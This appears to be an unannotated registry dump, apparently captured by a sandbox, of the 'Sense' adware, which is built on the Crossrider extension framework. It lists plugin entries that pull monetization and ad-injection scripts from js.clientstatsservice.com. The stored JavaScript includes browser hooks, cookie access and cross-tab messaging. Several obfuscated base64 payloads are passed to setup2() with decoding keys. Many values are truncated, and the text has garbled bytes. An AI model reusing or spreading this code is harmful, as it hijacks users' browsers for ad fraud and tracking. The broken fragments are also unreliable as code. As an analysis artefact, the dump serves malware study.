zMjIwMjEyNzM1MmIyMzJkMzUyYTRiNDM聛b"

    [HKCU\Software\Sense\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\Sense\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\102]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Sense\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Sense\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\Sense\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\246]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\Sense\Plugins\183]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\Sense\Installer]
    "osName" = "XP32"

    [HKCU\Software\Sense\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\Sense\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\Sense\Plugins\1]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

    [HKCU\Software\Sense\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\Sense\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Sense\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\Sense\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functib"

    [HKCU\Software\Sense\Plugins\226]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Sense\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NDdhNDUxYjFiMTUxNzM4MWMwMDRjNDk0NzUxMDcxNTEzMWQ1NDQzNDExYTA5MDcwYTE5MTM0MzAwMGQxODVlMGIxYTAxMGExNDQzMGQwMzAzNWMwZDAwNDAwODA5MTkwYjE0MWE1ZDBkMDA1MDAwMDEwNDBhNTEwZDAxMDgwMDFjMTMwZTA5MGIxZTQ4MDAxMjExMDYwNTVhMzIzMTJmM2MzYzM0MjAzZDI4MjMyODNjMzMzZDI2MjUyYzI2MjUzODMyNDgwMTBmMGIwYjFhMDEwYTE0NTA1NjRhMDIxYTA5MTgwYzBlMGIwMjFjNTE0ZDQzNTc0MzVmMjcyMTRmNDI2NjY3NTEwZjA3MWIxMTE0MzgxYzAwNGM0OTQ3NTEwNzE1MTMxZDFkNTY0MTVjMGUxZDFiMDQxZjE5NDAwMjBmMDU0YTFmMDYwZjBjMWU0MDBmMDExZTQ4MTkxYzRlMGUwMzFhMDkxNjA3NDkxOTFjNWUwNjBiMDcwODUzMTAxNTFjMWMxMjE1MDQwYTA5MWM1NTE0MDYwZDA4MDM1MDMxMzMyZDIxMjgyMDNjMzMyZTI5MmIzZTMxMjAzMjMxMzAyODIzMzIzMTRhMDMxMjFmMWYwNjBmMGMxZTUzNTQ0ODFmMGUxZDA0MDIwODAxMDExZTUzNTA1NzQzNWY1MTIxMmI0YzQwNjQ3YTQ1MDMwMzE0MDAwNDAwMjUwYTUxNWQ1MzVlNTM1NDQxNjQ0YzRlNTM0NzUxMTkwNDE1MTkwNzBmMGYxZjQ1NDk0ZjNhNDUwNDAwMTgwYjBiMTM1MTMyNmIxYQ==', 'lnsgsoagmn'); }"

    [HKCU\Software\Sense\Plugins\1]
    "Version" = "10"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Sense\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2MjdkNWIwZDA2MWUxNTIzMDUxYjRhNGU1OTQ3MWExZTExMDY0ZDU4NDcxZDE3MTYwNjQ0MTYxZTE4MDcxODFkMTcwMjEzMWUwMDU4MWUxOTBlMWI1NjBmMDE0NTE2MTEyODE1MGY1YTEzMTY0ZDJiMjMzMDNlM2IyMTM1MmQyMDJkMjMyMTRiMTQwNTFiMDYxZDE3NTQzOTMwMzQyODMzMjEyNzJkMzczYjI4MzAyMjMyMjUzNzNkM2Q1ODJkMzUyNjI0MzgyNDNiMjYzMDIxMzczODNhMjUyMjM1MzczZDNkM2EyZDRjMjcyNDM2MzkyYzJiM2QyYzIxM2EyOTM3MmUyODI2MzUzNDIwNGYzNTNhMzUyNTM4M2IyNzJiMmMzNjJmMzcyOTM2MjczODJiMzcyNDNmMmYzYTI5NTU1YjYyN2Q1YjBkMDYxZTE1MDUyMjA1MDQ1NjQzNDU1MDAyMTEwMjA3MDQ1MjViNTYwYzFjMTkxMTU4MDQxZjA3MDQwOTBjMWMwZDA0MDIxMjU5MDExYTFmMGE1ZDAwMTY1OTA0MTAzNzE2MWU0YjE4MTk1YTM3MzEzMTIxMzgzMDI0MjYyZjNhM2YzMzRhMGIwNjBhMTcxNjE4NDMyNTIyMzUzNzMwMzAzNjI2MzgyYzM0MjIyMzJkMjYyNjJjMzY1NzNhMjkzNDI1MjcyNzJhMzczYjJlMjAyNDI4MjQzZDM2MjYyYzM2MzUzYTUwMzUyNTI5M2EzZDNhMzYyMzM2MjYzYjM2MzEyYjM3MjQzZjJmNTgyOTI4MzQzYTNiMmEzNjIwMjMyMTMzMjUyODI5MjQyOTNhM2MyYjI4MzMyODI4NGE1ODczNmM1MDFhMDkwMzEwMWUwNjNkMWQ0NzQ4NGE1NzQyNDU1YjYyNTQ1OTQ1NTI0ODEzMTMwNTAzMDExNzE4MDk1MDUwNDUyZDU1MDQwMDFiMDkxNTFiMDQæ¹¥O"

    [HKCU\Software\Sense\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)b"

    [HKCU\Software\Sense\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=pb"

    [HKCU\Software\Sense\Plugins\39]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Sense\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\Sense\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Sense\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\Sense\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\239]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NTYzNTEwNDA1MDAxYzJkMDcwMDRkNTA1MzRlMTkwMDE4MDg0ZjQzNDAwYjAwMWUwNzU5MGQ1NjE0MDcwZTA3MTIwNTE5MTA0MjE2MTAxODQwMTkxNzQzNDA0MzVjNDg1YTVkNWY1ZTRiNDIxYjA3NGU1NDdmNjU0ZDAyMDcxODAxMDczOTBhMTk0ZTU1NGE1MTA0MDUwMDFjMGI0ZjQzNDAwYjAwMWUwNzU5MGQ1NjE0MDcwZTA3MTIwNTE5MTA0MjE2MTAxODQwMTkxNzQzNDA0MzVjNDg1YTVkNWY1ZTRiNDIxYjA3NGU1NDdmNjU0ZDFhMWYxOTE2MWQwMjMxMTE0ZTU1NGE0MTVmNDg1ODY2NTg1NTRjNGY0ODA1MDkwMzAwMDUxYjE0MDA0ZDUwNTMzNzUzMTUwODBiNTczMTQzNjA1MzRjNTE1NDRlMTExYjAwMDYwNDE2MjYyMjU2NTY1ODU3MWIwNjA0MTcwMzA2NWEzMzBhMDMxNjVlNWQ0MzVjMDk0NTVjNGM0ZDRjNTI0YTA4NGM1NjA0MTkxYTE5MDUxYzAyMTYxZTJlMDcxOTFhMWMwODQ4NTA1MzRiMmUyYjJmMmEzYTNmM2MzODNhMjgzNDI2MzMzNDNjMmIyNzNlMmMzZjI0MzYzMzMxMzEzMzMwNGQ1MzQ3NTE1MzVjNDg0NTVjNWY1YTQzNWM0MTQ0NWM1ZjA4NTc0ZDYwMGU=', 'lojslqtlxu'); }"

    [HKCU\Software\Sense\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKCU\Software\Sense\Plugins\93]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\Sense\Plugins\38]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

    [HKCU\Software\Sense\Plugins\43]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\Sense\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\Sense\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\Sense\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,b"

    [HKCU\Software\Sense\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMTYxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMDBiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMmEzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBiNTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYzI1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUwNTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMmQzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\37]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\Sense\Plugins\42]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\Sense\Plugins\233]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"

    [HKCU\Software\Sense\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Sense\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\Sense\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Sense\Manifest]
    "Name" = "Sense"

    [HKCU\Software\Sense\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Sense\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\Sense\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Sense\Plugins\28]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

    [HKCU\Software\Sense\Plugins\233]
    "Version" = "5"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "3E 4F BB 00 6A 35 2E 8E 13 4B F5 BC 8D DA 2E 72"

    [HKCU\Software\Sense\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\Sense\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Sense\Plugins\155]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,104,123,155,180,184,191,192,193,220,195,211,223,230,233,239,242,244,263,177,91,28"

    [HKCU\Software\Sense\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsb"

    [HKCU\Software\Sense\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\Sense\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\Sense\Plugins\233]
    "Name" = "revizer_p_dynamic_b2b_2_m"

    [HKCU\Software\Sense\Plugins\193]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nb"

    [HKCU\Software\Sense\Plugins\93]
    "Version" = "11"

    [HKCU\Software\Sense\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"

    [HKCU\Software\Sense\Plugins\191]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk3MDY4NTEwZjEyMDQxOTMzMDIwZTU4NWI1MzQ1MGUwNDFkMTY0YTRkNTUxMjA3MDYxMjE5MGE0ODEzMGIwZjE3MWM0OTA1MWYwNDQ5MWQwNzFlMDgxMjQ4MTUxNDAyNDkwMDEwMTMwMjE2MTQxNjExMWIxNDFmMTU1NzUwNWQ1MzQ4MWQwMDA4NWUwODA5NDM1ZjZkNmY1MjAxMTIwNDEyMDkzNDAxMGI0NDRhNDk0NDE4MTYwZTExMDA1ZDQ5NWYxYTAzMTMxNzA4MDQ1ZDA0MGYwNTFmMDk1ZTAxMTUwYzVjMGEwMzE0MDAwNzVmMTExZTBhNWMxNzE0MTkwYTAzMDMxMjFiMTMwMTA4MTE1ZDU4NDg0NDRjMTcwODFkNDkwYzAzNGI0YTdhNmI1ODExMWYxMjAxMTkwNzJmMTQ0MDQwNDE0MjVlNTc1YzYzNDY1MDQyNWE0MzA1MDIxNDA0MDAwNTExMGU1ODViNTMzYzQ0MDMwMTA5MDAxMjEzMGYxNDQ1M2I1YzYzNDY1MDQyNWE0MzFhMDkwYTE5MDcwMzNhMzE1ODViNTM0NTBmMTY0OTRlMDQxYjBhMDQxYzAxNDYwNzAwMDgxNDBkMGQ0ZjJjMDQwZjA1MWYwOTAwMTAxZjA3MDA0NzViNGQ1NDQ2NTcxNzE0MDUxNjAxMGYxZTBjMDI1NzRiNWExNjFhMDkwMjFmMWU0ODJmMDExMzE0MDUwODE2MDIwYzAwMDM0MjQ3NDEwODFhNWQ1MDQ5MTExOTBjMWUwZTA0NDkzOTEzMDAxMzA2MGQwYTEzMTYwMTE1NWUxOTE0MTkwMTFmMTIwMzA2MTQwMjA2MTE1MDVmNWExYTU0MDQwNzFkMTkwNzE5MDUxNDQ2NDk0NzQxMTMxYjA5MDMxMTA4MDgxNzAyMTQyZjM2MjUyMjJkMjkzMjIxMmUyMjM1M2IzOTIzMzczODNlM2EyMzM5MmY0 _"

    [HKCU\Software\Sense\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMTcxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFhMTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMDBjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMyODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3MzYzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNhMmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1NDQ2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAxMDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MDkwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJiMmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMTJiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQzOTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMjEyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJjMGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }"

    [HKCU\Software\Sense\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Sense\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){_"

    [HKCU\Software\Sense\Plugins\230]
    "Name" = "revizer_ws_dynamic_b2b_2_m"

    [HKCU\Software\Sense\Plugins\14]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\Sense\Plugins\246]
    "Version" = "11"

    [HKCU\Software\Sense\Plugins\3]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

    [HKCU\Software\Sense\Plugins\123]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_adv_m.js"

    [HKCU\Software\Sense\Plugins\21]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

    [HKCU\Software\Sense\Plugins\36]
    "Name" = "IEBackground"

    [HKCU\Software\Sense\Plugins\4]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Sense\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=bb"

    [HKCU\Software\Sense\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){if(!String.prototype.trim){String.prototype.trim=function(){return this.replace(/^\s |\s $/g,);};}if(!Array.prototype.filter){Array.prototype.filter=function(f){if(!this){throw new TypeError();}var k=Object(this);var e=k.length>>>0;if(typeof f!==function){throw new TypeError();}var j=[];var h=arguments[1];for(var g in k){if(k.hasOwnProperty(g)){if(f.call(h,k[g],g,k)){j.push(k[g]);}}}return j;};}if(!Array.prototype.forEach){Array.prototype.forEach=function c(l,f){var h,g;if(this==null){throw new TypeError(this is null or not defined);}var i,j=Object(this),e=j.length>>>0;if({}.toString.call(l)!==[object Function]){throw new TypeError(l is not a function);}if(arguments.length>=2){h=f;}g=0;while(g
    [HKCU\Software\Sense\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new 